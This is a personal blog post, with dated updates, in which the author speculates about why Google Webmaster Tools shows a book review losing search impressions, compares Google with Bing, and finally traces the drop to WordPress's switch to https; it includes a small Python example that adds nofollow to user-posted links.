Maybe Google considers my posting and the physics book author’s website part of such a link scam. I have linked to the author’s page several times – to sample chapters, generously made available via download as PDFs, and the author linked back to me. I had refused to tie my blog to my Google+ account and claim ‘Google authorship’ so far as I did not want to trade elkement for my real name on G+. Via Webmaster Tools Google knows about all my domains but they might suspect I – a pseudo-anonymous elkement, using an @subversiv.at address on G+ – might also own the book author’s domain that I – diabolically smart – did not declare in Webmaster Tools.

As I said before, from a most objective perspective Google’s rationale might not be that unreasonable. I don’t write book reviews that often; my most recent were about The Year Without Pants and The Glass Cage. I rather write posts triggered by one idea in a book, maybe not even the main one. When I write about books I don’t use Amazon Affiliate marketing – as professional reviewers such as Brain Pickings or Farnam Street do. I write about unrelated topics. I might not match the expected pattern. This is amusing as long as only a blog is concerned but in principle it is similar to being interviewed by the FBI at an airport because your travel pattern just can’t be normal (as detailed in the book Bursts, on modelling human behaviour – a book I also sort of reviewed last year).

In short, I sometimes review and ‘promote’ books without any return on that. I simply don’t review books I don’t like as I think blogging should be fun. Maybe in an age of gamified reviews and fake forum posts with spammy signatures Google simply doesn’t buy into that. I sympathize. I learned that forum websites should add a nofollow tag to any hyperlinks users post so that Google will not downvote the link targets. So links in discussion groups are considered spammy per se and you need to do something about it so that they don’t hurt what you – as a forum user – are probably trying to discuss or recommend in good faith. I already live in fear that those links some tinkerers set in DIYer’s forums (linking to our business site or my posts on our heating system) will be considered paid link spam.
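What such a forum would have to do is roughly the following: whenever it renders a link posted by a user, it adds rel="nofollow" to the anchor. This is only a minimal sketch; the function name render_user_link and the example URL are made up, and real forum software will do this inside its own templating or sanitizing layer.

```python
from html import escape


def render_user_link(url: str, text: str) -> str:
    """Render a user-submitted link as an anchor marked rel="nofollow"."""
    # Escape both the URL and the link text so user input cannot break the markup.
    return f'<a href="{escape(url, quote=True)}" rel="nofollow">{escape(text)}</a>'


# Hypothetical link a forum user might post.
print(render_user_link("https://example.com/heat-pump", "heat pump post"))
# prints: <a href="https://example.com/heat-pump" rel="nofollow">heat pump post</a>
```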

However, I cannot explain why I can find my book review post on Google (thus generating an impression) when searching for site:[URL of the post]. Perhaps consolidation takes time. Perhaps there is hope. I even see the post when I use Tor Browser and a foreign IP address so this is not related to my preferences as a logged on Google user. But if there isn’t a glitch in Webmaster Tools, no other typical searcher encounters this impression. I am aware of the tool for disavowing URLs but I don’t want to report a perfectly valid backlink. In addition, that backlink from the author’s site does not even show up in the list of external backlinks which is another enigma.

I know that this seems to be an obsession with a first world problem: This was a post on a topic in which I don’t claim expertise and which I don’t consider strategically important. But whatever happens to this blog could happen to other sites I am more concerned about, business-wise. So I hope it is just a bug and/or Google Bots will read this post and will release my link. Just in case I mentioned your book or blog here, even if indirectly, please don’t backlink.

Perhaps Google did not like my ranting about encrypted search terms, not available to the search term poet. I dared to display the Bing logo back then. Which I will do again now as:

  • Bing tells me that the infamous post generates impressions and clicks
  • Bing recognizes the backlink
  • The number of indexed pages is increasing gradually with time.
  • And Bing did not index the spammy pages in the brief period they were on our hacked website.

Bing logo (2013)

Update 2014-12-23 – it actually happened twice:

Analyzing the impressions from the last day I realize that Google has also treated my physics resources page Physics Books on the Bedside Table this way. Page impressions dropped and now that page, which was the top one (after the review had plummeted), is gone, too. I had already considered moving this page to my site that hosts all those lists of links (without issues, so far): radices.net, and I will complete this migration in a minute. Now of course Google might think I, the link spammer, am frantically moving on to another site.

Update 2014-12-24 – now at least results are consistent:

I cannot see my own review post anymore when I search for the title of the book. So finally the results from Webmaster Tools are in line with my tests.

Update 2015-01-23 – totally embarrassing final statement on this:

WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version which has to be added in Google Webmaster Tools as a separate website.